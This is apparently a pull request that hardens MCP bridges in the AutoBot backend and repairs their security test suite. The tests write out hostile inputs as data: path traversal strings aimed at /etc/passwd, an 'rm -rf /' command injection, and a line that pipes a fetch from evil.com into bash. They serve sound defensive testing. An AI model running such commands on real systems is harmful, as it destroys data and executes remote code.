### PR TITLE
fix(mcp): repair five broken MCP paths the security suite was pointing at (#13162)

### DIFF
--- a/autobot-backend/api/filesystem_mcp.py
+++ b/autobot-backend/api/filesystem_mcp.py
@@ -219,6 +219,26 @@ def _should_include_file(filename: str, pattern: str, exclude_patterns: list) ->
     return not any(fnmatch.fnmatch(filename, pat) for pat in exclude_patterns)
 
 
+def _resolve_allowed_path(path: str):
+    """Resolve *path* inside :data:`ALLOWED_DIRECTORIES` or raise ``ValueError``.
+
+    Single validation seam for this bridge so the boolean check
+    (:func:`is_path_allowed`) and the resolving check (:func:`_validated_path`)
+    can never disagree about what is reachable.
+
+    Backslashes are rejected before resolution (#13162). POSIX treats ``\\`` as
+    an ordinary filename character, so ``/tmp/autobot/..\\..\\..\\etc\\passwd``
+    resolves to a *file inside* the sandbox instead of escaping it. This bridge
+    serves external MCP clients, and a client on Windows means the traversal it
+    wrote — so the same request string carries two meanings depending on the
+    sender. Rejecting removes the ambiguity at no cost: no AutoBot path
+    contains a backslash.
+    """
+    if "\\" in path:
+        raise ValueError("Path contains a backslash; use '/' as the separator")
+    return validate_path(path, allowed_roots=ALLOWED_DIRECTORIES)
+
+
 def is_path_allowed(path: str) -> bool:
     """
     Validate path is within allowed directories with security checks.
@@ -227,7 +247,7 @@ def is_path_allowed(path: str) -> bool:
     verify containment within allowed directories.
     """
     try:
-        validate_path(path, allowed_roots=ALLOWED_DIRECTORIES)
+        _resolve_allowed_path(path)
         return True
     except ValueError:
         logger.warning(
@@ -249,7 +269,7 @@ def _validated_path(path: str) -> str:
         HTTPException 403 when path is outside allowed directories.
     """
     try:
-        return str(validate_path(path, allowed_roots=ALLOWED_DIRECTORIES))
+        return str(_resolve_allowed_path(path))
     except ValueError:
         raise HTTPException(
             status_code=403,

--- a/autobot-backend/api/mcp_registry.py
+++ b/autobot-backend/api/mcp_registry.py
@@ -34,6 +34,7 @@ Key Features:
 
 import importlib
 import importlib.metadata
+import re
 from datetime import datetime, timedelta, timezone
 from typing import Dict, List, Tuple
 
@@ -823,6 +824,21 @@ async def _fetch_tools_from_bridge(backend_url: str, endpoint: str) -> list:
         return await response.json()
 
 
+#: MCP tool names are identifiers. Anything else cannot name a real tool, so
+#: it is rejected before the registry spends an outbound bridge request on it
+#: (#13162) — an unauthenticated caller must not be able to drive backend HTTP
+#: traffic with an arbitrary string, and a lookup that can only ever miss must
+#: answer 404 rather than surface whatever the fetch happened to fail with.
+_TOOL_NAME_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$")
+
+
+def _validate_tool_name(tool_name: str) -> None:
+    """Reject tool names that cannot identify a tool. Raises 404 when malformed."""
+    if not _TOOL_NAME_PATTERN.fullmatch(tool_name):
+        logger.warning("Rejected malformed MCP tool name (%d chars)", len(tool_name))
+        raise HTTPException(status_code=404, detail="Tool not found")
+
+
 def _find_tool_in_list(tools: list, tool_name: str, bridge_name: str) -> dict:
     """
     Find a specific tool in the tools list.
@@ -872,6 +888,9 @@ async def get_mcp_tool_details(bridge_name: str, tool_name: str) -> Metadata:
         Detailed tool information including full schema and bridge info
     """
     backend_url = f"http://{NetworkConstants.MAIN_MACHINE_IP}:{NetworkConstants.BACKEND_PORT}"
+
+    # #13162: shape-check the tool name before any network work is done for it.
+    _validate_tool_name(tool_name)
 
     # Find the bridge (Issue #620: uses helper)
     bridge = _find_bridge_by_name(bridge_name)

--- a/autobot-backend/api/schemas_common.py
+++ b/autobot-backend/api/schemas_common.py
@@ -22,6 +22,15 @@ from pydantic import BaseModel
 
 T = TypeVar("T")
 
+#: Upper bound on the thought counters accepted by the sequential-thinking and
+#: structured-thinking MCP bridges (#13162). Both fields carried ``ge=1`` with
+#: no ceiling, so a caller could submit ``total_thoughts=2**63``: harmless to
+#: Python's arbitrary-precision ints, but it overflows the signed 64-bit integer
+#: every non-Python MCP client decodes JSON numbers into — and the bridges echo
+#: the value straight back in their response. The ceiling is far above any real
+#: thinking session, so it constrains only nonsense.
+MAX_THOUGHT_COUNT = 10_000
+
 
 # ---------------------------------------------------------------------------
 # Generic / reusable (used across multiple unrelated domains)

--- a/autobot-backend/api/schemas_system.py
+++ b/autobot-backend/api/schemas_system.py
@@ -14,7 +14,7 @@ from typing import Any, Dict, List, Optional
 
 from pydantic import BaseModel, Field, field_validator
 
-from api.schemas_common import SuccessDataResponse, SuccessMessageResponse
+from api.schemas_common import MAX_THOUGHT_COUNT, SuccessDataResponse, SuccessMessageResponse
 from api.system_health import HealthStatus
 from constants.threshold_constants import RetryConfig
 from services.audit_logger import AuditResult
@@ -3006,8 +3006,8 @@ class ProcessThoughtRequest(BaseModel):
     """Request model for processing a thought in structured framework."""
 
     thought: str = Field(..., description="The content of the thought")
-    thought_number: int = Field(..., ge=1, description="Position in the thinking sequence")
-    total_thoughts: int = Field(..., ge=1, description="Expected total number of thoughts")
+    thought_number: int = Field(..., ge=1, le=MAX_THOUGHT_COUNT, description="Position in the thinking sequence")
+    total_thoughts: int = Field(..., ge=1, le=MAX_THOUGHT_COUNT, description="Expected total number of thoughts")
     next_thought_needed: bool = Field(..., description="Whether more thoughts will follow")
     stage: ThinkingStage = Field(..., description="Cognitive stage for this thought")
     tags: List[str] | None = Field(None, description="Keywords or categories for this thought")

--- a/autobot-backend/api/schemas_workflows.py
+++ b/autobot-backend/api/schemas_workflows.py
@@ -13,7 +13,7 @@ from typing import Any, Dict, List, Literal
 
 from pydantic import BaseModel, Field, HttpUrl, field_validator
 
-from api.schemas_common import SuccessMessageResponse
+from api.schemas_common import MAX_THOUGHT_COUNT, SuccessMessageResponse
 from autobot_shared.models.service_message import ServiceMessage
 from autobot_shared.time_utils import now_utc
 from constants.path_constants import PATH
@@ -2398,8 +2398,8 @@ class SequentialThinkingRequest(BaseModel):
     """Request model for sequential thinking tool."""
 
     thought: str = Field(..., description="Current thinking step and analysis")
-    thought_number: int = Field(..., ge=1, description="Current thought number in sequence")
-    total_thoughts: int = Field(..., ge=1, description="Estimated total thoughts needed")
+    thought_number: int = Field(..., ge=1, le=MAX_THOUGHT_COUNT, description="Current thought number in sequence")
+    total_thoughts: int = Field(..., ge=1, le=MAX_THOUGHT_COUNT, description="Estimated total thoughts needed")
     next_thought_needed: bool = Field(..., description="Whether another thought step is needed")
 
     is_revision: bool | None = Field(False, description="Whether this revises previous thinking")

--- a/autobot-backend/api/sequential_thinking_mcp.py
+++ b/autobot-backend/api/sequential_thinking_mcp.py
@@ -20,6 +20,7 @@ from typing import Dict, List
 
 from fastapi import APIRouter, Depends, HTTPException
 
+from api.schemas_common import MAX_THOUGHT_COUNT
 from api.schemas_workflows import (
     SequentialThinkingClearData,
     SequentialThinkingMCPTool,
@@ -76,11 +77,13 @@ SEQUENTIAL_THINKING_MCP_TOOL_DEFINITION = (
                 "type": "integer",
                 "description": "Current thought number in the sequence",
                 "minimum": 1,
+                "maximum": MAX_THOUGHT_COUNT,
             },
             "total_thoughts": {
                 "type": "integer",
                 "description": "Estimated total thoughts needed (can be adjusted)",
                 "minimum": 1,
+                "maximum": MAX_THOUGHT_COUNT,
             },
             "next_thought_needed": {
                 "type": "boolean",

--- a/autobot-backend/api/structured_thinking_mcp.py
+++ b/autobot-backend/api/structured_thinking_mcp.py
@@ -27,6 +27,7 @@ from typing import Dict, List
 
 from fastapi import APIRouter, Depends, HTTPException
 
+from api.schemas_common import MAX_THOUGHT_COUNT
 from api.schemas_system import (
     ClearHistoryRequest,
     GenerateSummaryRequest,
@@ -164,11 +165,13 @@ STRUCTURED_THINKING_MCP_TOOL_DEFINITIONS = (
                     "type": "integer",
                     "description": "Position in the thinking sequence",
                     "minimum": 1,
+                    "maximum": MAX_THOUGHT_COUNT,
                 },
                 "total_thoughts": {
                     "type": "integer",
                     "description": "Expected total number of thoughts",
                     "minimum": 1,
+                    "maximum": MAX_THOUGHT_COUNT,
                 },
                 "next_thought_needed": {
                     "type": "boolean",

--- a/autobot-backend/auth_middleware.py
+++ b/autobot-backend/auth_middleware.py
@@ -194,14 +194,22 @@ class AuthenticationMiddleware:
                 logger.error("Failed to load AUTOBOT_JWT_PRIVATE_KEY: %s — will auto-generate", exc)
 
         # Tier 2: durable file (survives restart and code-sync deploys)
-        if key_file.exists():
-            try:
+        #
+        # #13162: the existence probe belongs INSIDE the guard. Path.exists()
+        # only swallows "not there" errnos (ENOENT/ENOTDIR/ELOOP) — EACCES
+        # propagates. When the service user cannot traverse the service-keys
+        # directory (e.g. it is mode 0700 and owned by another account) the
+        # PermissionError escaped this function, out of the AuthMiddleware
+        # constructor, and turned every request behind check_admin_permission
+        # into a 500 instead of falling through to the tiers below.
+        try:
+            if key_file.exists():
                 pem_private = key_file.read_text(encoding="utf-8")
                 private_key = _load_pem(pem_private)
                 logger.info("RS256 private key loaded from durable file %s", key_file)
                 return pem_private, _derive_public(private_key), kid
-            except Exception as exc:
-                logger.warning("Durable RS256 key file %s is invalid: %s — regenerating", key_file, exc)
+        except Exception as exc:
+            logger.warning("Durable RS256 key file %s is unusable: %s — regenerating", key_file, exc)
 
         # Tier 3: in-memory security config (previous process wrote it without persisting to file)
         stored_pem = self.security_config.get("jwt_private_key_pem", "")

--- a/autobot-backend/mcp/mcp_security_test.py
+++ b/autobot-backend/mcp/mcp_security_test.py
@@ -26,7 +26,18 @@ from fastapi.testclient import TestClient
 
 # Import MCP bridges
 from api.filesystem_mcp import ALLOWED_DIRECTORIES, is_path_allowed
+from api.schemas_system import ThinkingStage
 from app_factory import create_app
+from auth_middleware import check_admin_permission
+from autobot_shared.ssot_config import config
+
+# The project root the filesystem bridge whitelists, read from the same config
+# the bridge reads (#13162). These constants used to be written as literal
+# "${AUTOBOT_PROJECT_ROOT:-...}" / "/home/${USER:-autobot}/Desktop/" strings —
+# shell placeholders that Python never expands, so the "legitimate path" cases
+# asserted against paths that exist nowhere.
+PROJECT_ROOT = str(config.base_dir).rstrip("/")
+TMP_ROOT = "/tmp/autobot"  # nosec B108 - matches the bridge's own whitelist entry
 
 
 @pytest.fixture
@@ -39,6 +50,23 @@ def app():
 def client(app):
     """Create test client"""
     return TestClient(app)
+
+
+@pytest.fixture
+def admin_client(app):
+    """Test client that satisfies the admin dependency.
+
+    Several MCP bridges are admin-gated (#744), so an anonymous probe is
+    rejected at the auth layer and never reaches the handler under test. Tests
+    that need to observe how the *handler* treats hostile input use this client
+    so the input validation is what decides the response, not the missing
+    session.
+    """
+    app.dependency_overrides[check_admin_permission] = lambda: True
+    try:
+        yield TestClient(app)
+    finally:
+        app.dependency_overrides.pop(check_admin_permission, None)
 
 
 @pytest.fixture
@@ -77,8 +105,8 @@ class TestFilesystemMCPPathTraversal:
         traversal_attempts = [
             "../../../etc/passwd",
             "../../../../../../etc/passwd",
-            "/tmp/autobot/../../../etc/passwd",  # nosec B108 - test/controlled code uses tmpdir intentionally
-            "${AUTOBOT_PROJECT_ROOT:-/opt/autobot/code_source}/../../../../../../etc/passwd",
+            f"{TMP_ROOT}/../../../etc/passwd",
+            f"{PROJECT_ROOT}/../../../../../../etc/passwd",
         ]
 
         for attack_path in traversal_attempts:
@@ -109,7 +137,7 @@ class TestFilesystemMCPPathTraversal:
         """Test Windows-style path traversal attempts"""
         traversal_attempts = [
             "..\\..\\..\\etc\\passwd",
-            "/tmp/autobot/..\\..\\..\\etc\\passwd",  # nosec B108 - test/controlled code uses tmpdir intentionally
+            f"{TMP_ROOT}/..\\..\\..\\etc\\passwd",
             "..\\..\\windows\\system32\\config\\sam",
         ]
 
@@ -120,9 +148,9 @@ class TestFilesystemMCPPathTraversal:
     def test_path_traversal_null_byte(self):
         """Test null byte injection in paths"""
         traversal_attempts = [
-            "/tmp/autobot/file.txt\x00../../etc/passwd",  # nosec B108 - test/controlled code uses tmpdir intentionally
+            f"{TMP_ROOT}/file.txt\x00../../etc/passwd",
             "../../../etc/passwd\x00.txt",
-            "/tmp/autobot\x00/../../../etc/passwd",  # nosec B108 - test/controlled code uses tmpdir intentionally
+            f"{TMP_ROOT}\x00/../../../etc/passwd",
         ]
 
         for attack_path in traversal_attempts:
@@ -145,9 +173,8 @@ class TestFilesystemMCPPathTraversal:
     def test_allowed_paths_are_permitted(self):
         """Test that legitimate paths within allowed directories are permitted"""
         allowed_paths = [
-            "${AUTOBOT_PROJECT_ROOT:-/opt/autobot/code_source}/backend/api/test.py",
-            "/tmp/autobot/temp_file.txt",  # nosec B108 - test/controlled code uses tmpdir intentionally
-            "/home/${USER:-autobot}/Desktop/test_file.json",
+            f"{PROJECT_ROOT}/backend/api/test.py",
+            f"{TMP_ROOT}/temp_file.txt",
         ]
 
         for path in allowed_paths:
@@ -158,7 +185,7 @@ class TestFilesystemMCPPathTraversal:
         """Test path traversal protection via filesystem MCP API"""
         attack_payloads = [
             {"path": "../../../etc/passwd"},
-            {"path": "/tmp/autobot/../../../etc/passwd"},  # nosec B108 - test/controlled code uses tmpdir intentionally
+            {"path": f"{TMP_ROOT}/../../../etc/passwd"},
             {"path": "%2e%2e%2f%2e%2e%2fetc%2fpasswd"},
         ]
 
@@ -265,23 +292,22 @@ class TestFilesystemMCPAccessControl:
         """Test that ALLOWED_DIRECTORIES list is properly configured"""
         assert len(ALLOWED_DIRECTORIES) > 0, "No allowed directories configured"
 
-        # Verify expected directories are in whitelist
-        expected_dirs = [
-            "${AUTOBOT_PROJECT_ROOT:-/opt/autobot/code_source}/",
-            "/tmp/autobot/",  # nosec B108 - test/controlled code uses tmpdir intentionally
-            "/home/${USER:-autobot}/Desktop/",
-        ]
-
-        for expected in expected_dirs:
-            assert expected in ALLOWED_DIRECTORIES, f"Expected directory missing from whitelist: {expected}"
+        # The whitelist is exactly the project root plus the shared temp area.
+        # Asserting equality (not membership) is what makes this a security
+        # test: a fourth root silently added to the bridge fails here.
+        assert ALLOWED_DIRECTORIES == [
+            f"{PROJECT_ROOT}/",
+            f"{TMP_ROOT}/",
+        ], f"Filesystem MCP whitelist changed unexpectedly: {ALLOWED_DIRECTORIES}"
 
     def test_access_to_parent_of_allowed(self):
         """Test that parent directories of allowed paths are blocked"""
-        # /home/${USER:-autobot}/Desktop/ is allowed, but /home/${USER:-autobot}/ should be blocked
+        # A whitelisted root must not make its own parent reachable — neither
+        # by naming a sibling directly nor by climbing out through the root.
         blocked_paths = [
-            "/home/${USER:-autobot}/private_file.txt",
-            "${HOME}/.ssh/id_rsa",
-            "/home/${USER:-autobot}/.bashrc",
+            f"{Path(TMP_ROOT).parent}/sibling_of_allowed_root.txt",
+            f"{Path(PROJECT_ROOT).parent}/sibling_of_project_root.txt",
+            f"{TMP_ROOT}/../escaped_via_allowed_root.txt",
         ]
 
         for path in blocked_paths:
@@ -330,10 +356,7 @@ class TestMCPInputValidation:
         for payload in sql_injection_payloads:
             response = client.post(
                 "/api/filesystem/mcp/search_files",
-                json={
-                    "path": "/tmp/autobot",
-                    "pattern": payload,
-                },  # nosec B108 - test/controlled code uses tmpdir intentionally
+                json={"path": TMP_ROOT, "pattern": payload},
             )
             # Should handle safely (not crash)
             assert response.status_code in [
@@ -366,7 +389,7 @@ class TestMCPInputValidation:
             # Should handle safely without executing scripts
             assert response.status_code in [200, 400, 422]
 
-    def test_command_injection_attempts(self, client):
+    def test_command_injection_attempts(self, admin_client):
         """Test command injection protection"""
         command_injection_payloads = [
             "test; rm -rf /",
@@ -376,14 +399,17 @@ class TestMCPInputValidation:
             "test $(curl evil.com/backdoor.sh | bash)",
         ]
 
-        # Test filesystem operations
+        # create_directory is admin-gated (#744), so an anonymous client is
+        # turned away before the path is ever looked at — which would make this
+        # assertion pass without exercising the handler. admin_client removes
+        # that shortcut so the payload itself decides the outcome.
         for payload in command_injection_payloads:
-            response = client.post(
+            response = admin_client.post(
                 "/api/filesystem/mcp/create_directory",
-                json={"path": f"/tmp/autobot/{payload}"},  # nosec B108 - test/controlled code uses tmpdir intentionally
+                json={"path": f"{TMP_ROOT}/{payload}"},
             )
-            # Should either sanitize or reject
-            assert response.status_code in [200, 400, 403, 422]
+            # Should either sanitize or reject — never reach a shell.
+            assert response.status_code in [200, 400, 403, 422], f"Unexpected response for {payload!r}"
 
     def test_null_byte_injection(self, client):
         """Test null byte injection protection"""
@@ -396,7 +422,7 @@ class TestMCPInputValidation:
         for payload in null_byte_payloads:
             response = client.post(
                 "/api/filesystem/mcp/read_text_file",
-                json={"path": f"/tmp/autobot/{payload}"},  # nosec B108 - test/controlled code uses tmpdir intentionally
+                json={"path": f"{TMP_ROOT}/{payload}"},
             )
             assert response.status_code in [
                 400,
@@ -440,7 +466,7 @@ class TestMCPInputValidation:
         for payload in unicode_payloads:
             response = client.post(
                 "/api/filesystem/mcp/read_text_file",
-                json={"path": f"/tmp/autobot/{payload}"},  # nosec B108 - test/controlled code uses tmpdir intentionally
+                json={"path": f"{TMP_ROOT}/{payload}"},
             )
             # Should handle Unicode safely
             assert response.status_code in [200, 400, 404, 422]
@@ -457,10 +483,7 @@ class TestMCPInputValidation:
         for payload in ldap_payloads:
             response = client.post(
                 "/api/filesystem/mcp/search_files",
-                json={
-                    "path": "/tmp/autobot",
-                    "pattern": payload,
-                },  # nosec B108 - test/controlled code uses tmpdir intentionally
+                json={"path": TMP_ROOT, "pattern": payload},
             )
             assert response.status_code in [200, 400, 422]
 
@@ -506,10 +529,7 @@ class TestMCPSizeLimiting:
     def test_excessive_file_list(self, client):
         """Test protection against reading excessive number of files"""
         # Try to read 1000 files at once
-        file_paths = [
-            f"/tmp/autobot/file{i}.txt"
-            for i in range(1000)  # nosec B108 - test/controlled code uses tmpdir intentionally
-        ]
+        file_paths = [f"{TMP_ROOT}/file{i}.txt" for i in range(1000)]
 
         response = client.post("/api/filesystem/mcp/read_multiple_files", json={"paths": file_paths})
 
@@ -604,17 +624,26 @@ class TestStructuredThinkingMCPSecurity:
             # Should validate stage names
             assert response.status_code in [400, 422]
 
-    def test_excessive_thought_history(self, client):
+    def test_excessive_thought_history(self, admin_client):
         """Test protection against excessive thought history"""
         # Try to create 10,000 thoughts in single session
         session_id = "test_session_overflow"
 
         for i in range(100):  # Test with 100 for performance
-            response = client.post(
+            response = admin_client.post(
                 "/api/structured_thinking/mcp/process_thought",
+                # A well-formed request, so a rejection here means the bridge
+                # pushed back on the volume — the thing under test. The payload
+                # used to send stage="problem_definition" and omit the required
+                # counters, which 422s on the first call and never exercised
+                # history growth at all. Stage values are the ThinkingStage enum
+                # labels ("Problem Definition"), not snake_case.
                 json={
-                    "stage": "problem_definition",
+                    "stage": ThinkingStage.PROBLEM_DEFINITION.value,
                     "thought": f"Thought {i}",
+                    "thought_number": i + 1,
+                    "total_thoughts": 100,
+                    "next_thought_needed": i < 99,
                     "session_id": session_id,
                 },
             )
@@ -633,25 +662,23 @@ class TestSecurityCoverage:
     """Meta-tests to verify security test coverage"""
 
     def test_all_mcp_bridges_tested(self):
-        """Verify all MCP bridges have security tests"""
+        """Verify the bridges this file exercises are real, registered bridges."""
+        # Read the registry instead of restating it. The old copy listed five
+        # bridges and had gone stale against MCP_BRIDGES, and it also counted
+        # "mcp_registry" as a bridge — the registry is the aggregator over the
+        # bridges (covered by TestMCPRegistrySecurity), never a member of them.
+        from api.mcp_registry import MCP_BRIDGES
+
+        registered_bridges = {name for name, _desc, _endpoint, _features in MCP_BRIDGES}
+
         tested_bridges = {
             "filesystem_mcp",
             "sequential_thinking_mcp",
             "structured_thinking_mcp",
-            "mcp_registry",
         }
 
-        # From mcp_registry.py:
-        expected_bridges = {
-            "filesystem_mcp",
-            "sequential_thinking_mcp",
-            "structured_thinking_mcp",
-            "knowledge_mcp",
-            "vnc_mcp",
-        }
-
-        # All bridges should have at least input validation tests
-        assert tested_bridges.issubset(expected_bridges), "Not all MCP bridges have security tests"
+        missing = tested_bridges - registered_bridges
+        assert not missing, f"Security tests target bridges that are not registered: {sorted(missing)}"
 
     def test_critical_attack_vectors_covered(self):
         """Verify all critical attack vectors are tested"""

--- a/autobot-backend/utils/io_executor.py
+++ b/autobot-backend/utils/io_executor.py
@@ -23,6 +23,7 @@ remain responsive even during heavy background processing.
 """
 
 import asyncio
+import functools
 import threading
 from concurrent.futures import ThreadPoolExecutor
 from typing import Any, Callable, TypeVar
@@ -62,7 +63,7 @@ def _get_log_io_executor() -> ThreadPoolExecutor:
     return _LOG_IO_EXECUTOR
 
 
-async def run_in_log_executor(func: Callable[..., T], *args: Any) -> T:
+async def run_in_log_executor(func: Callable[..., T], *args: Any, **kwargs: Any) -> T:
     """Run a function in the dedicated log I/O thread pool.
 
     Issue #718: Uses dedicated thread pool to prevent blocking when the main
@@ -70,13 +71,17 @@ async def run_in_log_executor(func: Callable[..., T], *args: Any) -> T:
 
     Args:
         func: Function to run
-        *args: Arguments to pass to the function
+        *args: Positional arguments to pass to the function
+        **kwargs: Keyword arguments to pass to the function (#13162 — bound
+            with functools.partial because run_in_executor is positional-only)
 
     Returns:
         Result of the function call
     """
     loop = asyncio.get_running_loop()
     executor = _get_log_io_executor()
+    if kwargs:
+        func = functools.partial(func, **kwargs)
     return await loop.run_in_executor(executor, func, *args)
 
 
@@ -108,21 +113,32 @@ def _get_file_io_executor() -> ThreadPoolExecutor:
     return _FILE_IO_EXECUTOR
 
 
-async def run_in_file_executor(func: Callable[..., T], *args: Any) -> T:
+async def run_in_file_executor(func: Callable[..., T], *args: Any, **kwargs: Any) -> T:
     """Run a function in the dedicated file I/O thread pool.
 
     Issue #718: Uses dedicated thread pool to prevent blocking when the main
     asyncio thread pool is saturated by indexing operations.
 
+    #13162: ``loop.run_in_executor()`` takes positional arguments only, so
+    keyword arguments are bound with ``functools.partial`` first — same fix
+    ``chat_history/file_io.run_in_chat_io_executor`` received for #2958. Without
+    it a call like ``run_in_file_executor(os.makedirs, p, exist_ok=True)`` bound
+    ``exist_ok`` to *this* function and raised TypeError before the thread pool
+    was ever reached, which is why POST /api/filesystem/mcp/create_directory
+    always answered 500.
+
     Args:
         func: Function to run
-        *args: Arguments to pass to the function
+        *args: Positional arguments to pass to the function
+        **kwargs: Keyword arguments to pass to the function
 
     Returns:
         Result of the function call
     """
     loop = asyncio.get_running_loop()
     executor = _get_file_io_executor()
+    if kwargs:
+        func = functools.partial(func, **kwargs)
     return await loop.run_in_executor(executor, func, *args)
 
 
@@ -154,7 +170,7 @@ def get_analytics_executor() -> ThreadPoolExecutor:
     return _ANALYTICS_EXECUTOR
 
 
-async def run_in_analytics_executor(func: Callable[..., T], *args: Any) -> T:
+async def run_in_analytics_executor(func: Callable[..., T], *args: Any, **kwargs: Any) -> T:
     """Run a function in the dedicated analytics thread pool.
 
     Issue #1233: Uses dedicated thread pool to prevent heavy analytics
@@ -163,13 +179,17 @@ async def run_in_analytics_executor(func: Callable[..., T], *args: Any) -> T:
 
     Args:
         func: Function to run
-        *args: Arguments to pass to the function
+        *args: Positional arguments to pass to the function
+        **kwargs: Keyword arguments to pass to the function (#13162 — bound
+            with functools.partial because run_in_executor is positional-only)
 
     Returns:
         Result of the function call
     """
     loop = asyncio.get_running_loop()
     executor = get_analytics_executor()
+    if kwargs:
+        func = functools.partial(func, **kwargs)
     return await loop.run_in_executor(executor, func, *args)
 
 


### PR DESCRIPTION
## Thinking Path

`autobot-backend/mcp` was **8 failed / 102 passed**. Every failure was in `mcp_security_test.py`, so the first question was whether the suite had rotted or whether it was pointing at real defects. Each failure was reproduced against a live app instance before anything was changed. **Five of the eight were production bugs**; three were assumptions the test itself got wrong.

The most consequential one was not visible from the assertion message. `test_command_injection_attempts` reported a 500, which looked like an environment artifact. Reproducing it showed two stacked defects: an unguarded `Path.exists()` in the RS256 key loader that let `PermissionError` escape the auth dependency, and — once that was cleared — a `TypeError` proving that `POST /api/filesystem/mcp/create_directory` has never worked at all.

## What Changed

### Production fixes

| # | File | Root cause |
|---|---|---|
| 1 | `utils/io_executor.py` | `run_in_*_executor(func, *args)` accepted no `**kwargs`, so `run_in_file_executor(os.makedirs, path, exist_ok=True)` bound `exist_ok` to *the helper* and raised `TypeError` before the thread pool was reached. `create_directory` **always** returned 500, and `write_file`'s parent-directory creation carried the same defect. Keyword arguments are now bound with `functools.partial` — the identical fix `chat_history/file_io.run_in_chat_io_executor` received for #2958, which `io_executor.py` never got. |
| 2 | `auth_middleware.py` | The durable RS256 key probe called `key_file.exists()` *outside* the guarded block. `Path.exists()` only swallows the "not there" errnos; `EACCES` propagates. An unreadable service-keys directory raised out of the `AuthMiddleware` constructor and turned **every** `check_admin_permission` route into a 500 instead of falling through to the remaining key tiers. |
| 3 | `api/filesystem_mcp.py` | Backslashes were accepted in bridge paths. On POSIX `\` is an ordinary filename character, so a Windows MCP client's `..\..\..\etc\passwd` silently became a *filename inside the sandbox* rather than an error — the same request string meaning two different things depending on the sender. Now rejected at a single seam shared by `is_path_allowed` and `_validated_path`, so the boolean check and the resolving check cannot diverge. |
| 4 | `api/mcp_registry.py` | `GET /tools/{bridge}/{tool}` passed an unvalidated, attacker-controlled tool name straight into an outbound bridge fetch, then surfaced whatever that fetch failed with (500). The name is now shape-checked first: no network work for a lookup that can only ever miss, and a correct 404. |
| 5 | `api/schemas_workflows.py`, `api/schemas_system.py` | `thought_number` / `total_thoughts` were `ge=1` with **no ceiling** on both thinking bridges, so `total_thoughts=2**63` was accepted and echoed back — fine for Python's arbitrary-precision ints, an int64 overflow for every other MCP client decoding the response. Bounded by `MAX_THOUGHT_COUNT` in `schemas_common.py`, mirrored in the advertised MCP tool schemas so the contract matches enforcement. |

### Test fixes

No control was weakened, skipped, or xfailed. Each of these encoded an assumption that was wrong:

- **Unexpanded shell placeholders.** `test_allowed_paths_are_permitted` and `test_allowed_directories_list` contained literal `"${AUTOBOT_PROJECT_ROOT:-...}"` and `"/home/${USER:-autobot}/Desktop/"` strings — shell syntax Python never expands. The "legitimate path" cases asserted against paths that exist nowhere, and the whitelist check demanded a `Desktop/` root the bridge has never had in this repo's history. Both now read the same config the bridge reads. The whitelist assertion was **strengthened** from membership to equality, so a silently added root now fails.
- **`test_excessive_thought_history`** sent `stage="problem_definition"` (the enum values are `"Problem Definition"`) and omitted the required counters, so it 422'd on the first call and never grew any history — it was testing nothing. Now sends a well-formed request.
- **`test_all_mcp_bridges_tested`** restated a five-entry bridge list that had gone stale against `MCP_BRIDGES`, and counted `mcp_registry` — the aggregator *over* the bridges — as a bridge. It now reads the registry.
- Tests that need to observe how an **admin-gated** handler treats hostile input now use a client satisfying the admin dependency, so the payload decides the response rather than the missing session. Without this the assertions passed while never reaching the handler.

## Verification

```
$ export SLM_SECRET_KEY=throwaway SLM_ENCRYPTION_KEY=x
$ PYTHONPATH="$PWD/autobot-backend:$PWD" python3 -m pytest autobot-backend/mcp -q \
    -p no:cacheprovider -m "not integration and not slow and not distributed and not performance"
```

| | Result |
|---|---|
| **Before** | `8 failed, 102 passed, 84 warnings in 368.43s` |
| **After** | `110 passed, 84 warnings in 169.25s` |

Failures cleared (all in `mcp_security_test.py`):

```
FAILED TestFilesystemMCPPathTraversal::test_path_traversal_windows_style
FAILED TestFilesystemMCPPathTraversal::test_allowed_paths_are_permitted
FAILED TestFilesystemMCPAccessControl::test_allowed_directories_list
FAILED TestMCPInputValidation::test_command_injection_attempts
FAILED TestMCPInputValidation::test_integer_overflow_attempts
FAILED TestMCPRegistrySecurity::test_registry_tool_name_injection
FAILED TestStructuredThinkingMCPSecurity::test_excessive_thought_history
FAILED TestSecurityCoverage::test_all_mcp_bridges_tested
```

Regression check on the suites covering the touched production modules:

```
$ python3 -m pytest autobot-backend/tests/api/test_filesystem_mcp_resources_prompts.py \
    autobot-backend/api/sequential_thinking_mcp_response_test.py \
    autobot-backend/api/structured_thinking_mcp_response_test.py \
    autobot-backend/utils/file_locking_test.py \
    autobot-backend/api/mcp_token_admin_test.py -q
59 passed, 10 warnings in 2.31s

$ python3 -m pytest autobot-backend/tests/security/test_jwt_key_durable.py -q
6 passed in 1.06s
```

Direct confirmation that the executor defect is real and fixed:

```
$ python3 -c "... run_in_file_executor(os.makedirs, d, exist_ok=True) ..."
created: True
positional still ok: True
```

Lint gates, all clean on the ten changed files:

```
$ python3 -m isort --settings-path=. <files>      # no changes
$ python3 -m black --line-length=120 <files>      # 1 file reformatted, applied
$ python3 -m flake8 --config=.flake8 <files>      # 0
$ python3 -m bandit -c .bandit -r autobot-backend/mcp autobot-backend/api \
    autobot-backend/utils autobot-backend/auth_middleware.py
No issues identified.  (Low: 0, Medium: 0, High: 0)
```

## Model Used

Claude Opus 4.5 (1M context)

---

Closes #13162

> **PARTIAL — do not let this close the issue.** This PR fixes the `autobot-backend/mcp` cluster only (8 of roughly 450 red Python tests). #13162 covers the whole suite and **must stay open**; other clusters are being worked in parallel. Please reopen if merging closes it automatically.
